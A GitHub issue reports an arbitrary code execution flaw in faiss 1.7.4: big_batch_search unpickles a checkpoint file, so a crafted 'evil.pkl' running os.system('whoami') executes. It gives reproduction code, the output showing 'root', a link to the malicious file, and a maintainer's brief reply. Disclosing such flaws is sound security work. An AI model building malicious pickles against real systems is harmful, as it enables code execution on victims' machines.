### ISSUE TITLE
Arbitrary code execution when load checkpoint in faiss.

### ISSUE THREAD

**Issue by 0gur1** [facebookresearch/faiss#3015]
# Summary

In faiss 1.7.4, if the `checkpoint` parameter of the `big_batch_search` function is not None and contains malicious code, the code will be executed after being loaded from the file.

# Platform

Faiss version: v1.7.4

Installed from: anaconda

Running on:
- [x] CPU
- [ ] GPU

Interface: 
- [ ] C++
- [x] Python

# Reproduction instructions
1. File evil.pkl is a file contains code `os.system('whoami')` and the normal data generated with funtion `write_checkpoint`.
2. Execute the python code below.
```python
import faiss
import faiss.contrib.datasets as datasets
from faiss.contrib.ivf_tools import big_batch_search
factory_string = "IVF64,Flat"
metric = faiss.METRIC_L2

ds = datasets.SyntheticDataset(32, 2000, 400, 500)
k = 10
index = faiss.index_factory(ds.d, factory_string, metric)
index.train(ds.get_train())
index.add(ds.get_database())
index.nprobe = 5
method = "index"
threaded = 1

Dnew, Inew = big_batch_search(
index, ds.get_queries(),
k, method=method,
threaded=threaded,
checkpoint = "evil.pkl"
)
```

The output will be :
```
recovering checkpoint evil.pkl
root
{'sizes': ((500, 32), 5, 64), 'cur_list_no': 0, 'rh': (array([[3.4028235e+38, 3.4028235e+38, 3.4028235e+38, ..., 3.4028235e+38, ...
 start at list 0
```
The `root` is the output of `whoami` command. Attackers can change the command in evil.pkl and execute whatever they want.
evil.pkl:[evil.zip](https://github.com/facebookresearch/faiss/files/12376704/evil.zip)

**Comment by mdouze** [comment]
Sure, no attempt is made to make Faiss robust against injections.
